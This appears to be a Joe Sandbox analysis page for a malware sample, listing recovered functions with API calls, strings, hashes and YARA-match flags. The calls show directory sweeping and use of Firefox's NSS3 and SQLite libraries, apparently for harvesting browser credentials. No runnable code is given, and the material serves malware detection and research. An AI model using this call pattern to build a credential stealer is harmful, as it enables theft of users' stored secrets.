Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: e01cd2334cab67c6ac1af75342ef43081e20f8d666f6633e0e884be28a16ead1
Instruction ID: 30777fc1d3d946c4cd7f0deada36363548776f4610b6e0a93d0a35b9a335c9ff
Opcode Fuzzy Hash: e01cd2334cab67c6ac1af75342ef43081e20f8d666f6633e0e884be28a16ead1
Instruction Fuzzy Hash: A59162B59402199BDB25EFA4CC88EEFB3B8BB58700F04459CF60A92145EB74DA85CF61

Function 6C5BAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5BACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C5BACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C5BACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C5BAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C5BADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5BADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5BADF0

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5BB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5BB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5BB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5BB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C5BB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5BB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5BB40C

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 556d95bf4221db0ca58b923bd4f4f19edc465b9f43aa419aca6fb095784de5b0
Instruction ID: e153b8564478e57b0d5e4dedff8cc607200e2813b984d687a18c943199e47d2b
Opcode Fuzzy Hash: 556d95bf4221db0ca58b923bd4f4f19edc465b9f43aa419aca6fb095784de5b0
Instruction Fuzzy Hash: D022C270904301EFE710DF15CC94BAA7BE1AF84308F14857CE8596B792E7B2E859CB96

Function 6C53ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C53ED38

Part of subcall function 6C4D4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C53EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C53EFE4

Part of subcall function 6C5FDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C4D5001,?,00000003,00000000), ref: 6C5FDFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C53F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C53F129
sqlite3_mprintf.NSS3(optimize), ref: 6C53F1D1
sqlite3_free.NSS3(?), ref: 6C53F368

Strings

unicode61, xrefs: 6C53EDB5
fts3_tokenizer, xrefs: 6C53EE1A, 6C53EEA8
fts4aux, xrefs: 6C53ECF9
matchinfo, xrefs: 6C53F04F, 6C53F082, 6C53F0C2, 6C53F0F2, 6C53F124, 6C53F169
simple, xrefs: 6C53ED79
fts3tokenize, xrefs: 6C53F30F
porter, xrefs: 6C53ED97
fts4, xrefs: 6C53F2AD
optimize, xrefs: 6C53F199, 6C53F1CC, 6C53F211
fts3, xrefs: 6C53F247
offsets, xrefs: 6C53EFAF, 6C53EFDF, 6C53F01F
snippet, xrefs: 6C53EF05, 6C53EF37, 6C53EF7C

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: a039cabd0c761819174eb6df1481f07c35df4b481d4b0b198212b1701ae2450d
Instruction ID: c28ab298b65466de395e6f167863c21e7221c80a88d52d6fbd375a3b47f0c543
Opcode Fuzzy Hash: a039cabd0c761819174eb6df1481f07c35df4b481d4b0b198212b1701ae2450d
Instruction Fuzzy Hash: C602F1B1B047118BE7049F62AC9572B33B1AFC5208F149A3CD85E87B41FBB4E8568796

Function 017F31E0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 017F31F0
HeapAlloc.KERNEL32(00000000), ref: 017F31F7
wsprintfA.USER32 ref: 017F3213
FindFirstFileA.KERNEL32(?,?), ref: 017F322A
StrCmpCA.SHLWAPI(?,017FE8AC), ref: 017F3258
StrCmpCA.SHLWAPI(?,017FE8B0), ref: 017F326E
FindNextFileA.KERNEL32(000000FF,?), ref: 017F32EF
FindClose.KERNEL32(000000FF), ref: 017F3304
lstrcat.KERNEL32(?,013BE558), ref: 017F3329
lstrcat.KERNEL32(?,013C0E88), ref: 017F333C
lstrlen.KERNEL32(?), ref: 017F3349
lstrlen.KERNEL32(?), ref: 017F335A

Strings

%s\*, xrefs: 017F3207
%s\%s, xrefs: 017F3285

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 61b1114e8db58a589677128df49bbde0b676f40b1ac33de9e888860957013fa1
Instruction ID: e752503efaa04409a23a216b0d4e1d369da2199f65bbcb6c61e2bf5adb4c7929
Opcode Fuzzy Hash: 61b1114e8db58a589677128df49bbde0b676f40b1ac33de9e888860957013fa1
Instruction Fuzzy Hash: FC5171B5940218ABCB25EBB4DC8DEDEB37CAB58700F00458CF60A96184EB749B85CF91

Function 017F6F20 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 017F7046

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: 1dae2af5f0b2268ebd89153e125315917c6864ffe8bac429b09ad6b6126c62e0
Instruction ID: ce14a410aa8e8bcc4b54d6d7e721d95631546e0b56f6f867f20dfea85f550bd5
Opcode Fuzzy Hash: 1dae2af5f0b2268ebd89153e125315917c6864ffe8bac429b09ad6b6126c62e0
Instruction Fuzzy Hash: 6071ECB5E10208ABDB14DFE4D889FEEB7B9BF48711F108508F606A7284DB74A945CF60

Function 6C54EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C54EF63

Part of subcall function 6C5587D0: PORT_NewArena_Util.NSS3(00000800,6C54EF74,00000000), ref: 6C5587E8
Part of subcall function 6C5587D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C54EF74,00000000), ref: 6C5587FD
Part of subcall function 6C5587D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C55884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C54F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C54F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C54F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C54F374
PL_strcasecmp.NSS3(6C692FD4,?), ref: 6C54F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C54F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C54F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C54F67D
CERT_DestroyName.NSS3(?), ref: 6C54F68B

Part of subcall function 6C558320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C558338
Part of subcall function 6C558320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C558364
Part of subcall function 6C558320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C55838E
Part of subcall function 6C558320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5583A5
Part of subcall function 6C558320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5583E3

Part of subcall function 6C5584C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C5584D9
Part of subcall function 6C5584C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C558528

Part of subcall function 6C558900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C54F599,?,00000000), ref: 6C558955

Strings

oid., xrefs: 6C54F2CF
", xrefs: 6C54F21B
*, xrefs: 6C54F3C6

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: cbebef3b6bff135e2b92d526c9bb4e967142971aeab17fa6f490fc80735bcd59
Instruction ID: 4869f6d6233ef72998110991c81c208b8a0cee0eb2bbf8ffee2bb4cc815bba9c
Opcode Fuzzy Hash: cbebef3b6bff135e2b92d526c9bb4e967142971aeab17fa6f490fc80735bcd59
Instruction Fuzzy Hash: E422F47160C3418BD714CE6DDC907AAB7E6ABC5328F18CB2EE49587B91E7319C05CB92

Function 017F2B70 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 017F2B8D
FindFirstFileA.KERNEL32(?,?), ref: 017F2BA4
StrCmpCA.SHLWAPI(?,017FE894), ref: 017F2BD2
StrCmpCA.SHLWAPI(?,017FE898), ref: 017F2BE8
FindNextFileA.KERNEL32(000000FF,?), ref: 017F2D2D
FindClose.KERNEL32(000000FF), ref: 017F2D42

Strings

%s\%s, xrefs: 017F2B81

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 4b1a3192dab0880d9c9e82fff4ab64be596df9da077a17b5d2edadc55f06a979
Instruction ID: 09acee1c8d7ceeeb0af06ce7ac5e1e2c84890473ee57f4d00b31e8bbea45914f
Opcode Fuzzy Hash: 4b1a3192dab0880d9c9e82fff4ab64be596df9da077a17b5d2edadc55f06a979
Instruction Fuzzy Hash: BE5152B5940219ABCB25EFB0DC89EEEB37CBB58704F04858CB70996144EB70AB85CF50

Function 6C5BEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C5BDAE2,?), ref: 6C5BC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5BF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5BF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C5BF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5BF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C68218C), ref: 6C5BF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C5BF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5BF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C5BF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C5BF210

Part of subcall function 6C5652D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C5BF1E9,?,00000000,?,?), ref: 6C5652F5
Part of subcall function 6C5652D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C56530F
Part of subcall function 6C5652D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C565326
Part of subcall function 6C5652D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C5BF1E9,?,00000000,?,?), ref: 6C565340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5BF227

Part of subcall function 6C5AFAB0: free.MOZGLUE(?,-00000001,?,?,6C54F673,00000000,00000000), ref: 6C5AFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C5BF23E

Part of subcall function 6C5ABE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C55E708,00000000,00000000,00000004,00000000), ref: 6C5ABE6A
Part of subcall function 6C5ABE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5604DC,?), ref: 6C5ABE7E
Part of subcall function 6C5ABE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5ABEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5BF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C5BF3A8

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C5BF3B3

Part of subcall function 6C562D20: PK11_DestroyObject.NSS3(?,?), ref: 6C562D3C
Part of subcall function 6C562D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C562D5F

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: f572794dbf9a509d49fbe85cd0e1115b18f23b3ff982c9991fc9417d5fdf535f
Instruction ID: 5861db8a15e0a16a068c8fb02c5ef3aa268c40091363286c20da6e30d0c94598
Opcode Fuzzy Hash: f572794dbf9a509d49fbe85cd0e1115b18f23b3ff982c9991fc9417d5fdf535f
Instruction Fuzzy Hash: 94D15FB9E016099BDB14CF9ADC90A9EBBB5EF48308F158229D915B7711E731EC06CB50

Function 6C4DECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4DED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4DEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4DEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C4DEF98

Strings

%s at line %d of [%.10s], xrefs: 6C4DF492
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4DF483
database corruption, xrefs: 6C4DF48D

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: cf603b324bdb62d6dc0e73477540a180fcb8339697187496166063f2e2668073
Instruction ID: 69f0b3da92f34899aa8fddb5a9502fc99c49390f7e023902e9a53afc50930d2a
Opcode Fuzzy Hash: cf603b324bdb62d6dc0e73477540a180fcb8339697187496166063f2e2668073
Instruction Fuzzy Hash: 07623430A052458FEB24DF25C4A0F9ABBF1BF49329F1A419DD8455BB92D731F882CB94

Function 017EE450 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 017EE46E
FindFirstFileA.KERNEL32(?,?), ref: 017EE485
StrCmpCA.SHLWAPI(?,017FED88), ref: 017EE4DB
StrCmpCA.SHLWAPI(?,017FED8C), ref: 017EE4F1
FindNextFileA.KERNEL32(000000FF,?), ref: 017EE9D5
FindClose.KERNEL32(000000FF), ref: 017EE9EA

Strings

%s\*.*, xrefs: 017EE462

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 41c6272ca30fe2cf0c29022b855b3c476e0df07a1028bbeffcdf467b290352dd
Instruction ID: 2581413f39edd734efa2247a5fd0ec5647ec05a50a37f4e47e9e30e39534ce36
Opcode Fuzzy Hash: 41c6272ca30fe2cf0c29022b855b3c476e0df07a1028bbeffcdf467b290352dd
Instruction Fuzzy Hash: A5E1FD729111199ADF55EF60CC98EEFF378AF64300F4041DDA60A6255AEF306B89CF62

Function 6C4EAEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C60CF46,?,6C4DCDBD,?,6C60BF31,?,?,?,?,?,?,?), ref: 6C4EB039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C60CF46,?,6C4DCDBD,?,6C60BF31), ref: 6C4EB090
sqlite3_free.NSS3(?,?,?,?,?,?,6C60CF46,?,6C4DCDBD,?,6C60BF31), ref: 6C4EB0A2
CloseHandle.KERNEL32(?,?,6C60CF46,?,6C4DCDBD,?,6C60BF31,?,?,?,?,?,?,?,?,?), ref: 6C4EB100
sqlite3_free.NSS3(?,?,00000002,?,6C60CF46,?,6C4DCDBD,?,6C60BF31,?,?,?,?,?,?,?), ref: 6C4EB115
sqlite3_free.NSS3(?,?,?,?,?,?,6C60CF46,?,6C4DCDBD,?,6C60BF31), ref: 6C4EB12D

Part of subcall function 6C4D9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C4EC6FD,?,?,?,?,6C53F965,00000000), ref: 6C4D9F0E
Part of subcall function 6C4D9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C53F965,00000000), ref: 6C4D9F5D

Strings

`fl, xrefs: 6C4EB0DF

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `fl
API String ID: 3155957115-3968216106
Opcode ID: ffdd1aeddd0484be553945b77cac727705c873f54683d0293db8410eabf756a6
Instruction ID: ee0600557cd4a9b60ae84745f6c554b702ee3031d304aa63e6d295dbc460ef21
Opcode Fuzzy Hash: ffdd1aeddd0484be553945b77cac727705c873f54683d0293db8410eabf756a6
Instruction Fuzzy Hash: F691BEB0A043068FDB04CF65D884F6ABBB1FF4930AF16462DE45697B50EB31E851CB99

Function 6C580EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C580F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C580FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C581006
PK11_FreeSymKey.NSS3(?), ref: 6C58101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C581033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C58103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C581048
memcpy.VCRUNTIME140(?,?,?), ref: 6C58108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5810BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C5810D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C58112E

Part of subcall function 6C581570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C5808C4,?,?), ref: 6C5815B8
Part of subcall function 6C581570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C5808C4,?,?), ref: 6C5815C1
Part of subcall function 6C581570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C58162E
Part of subcall function 6C581570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C581637

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

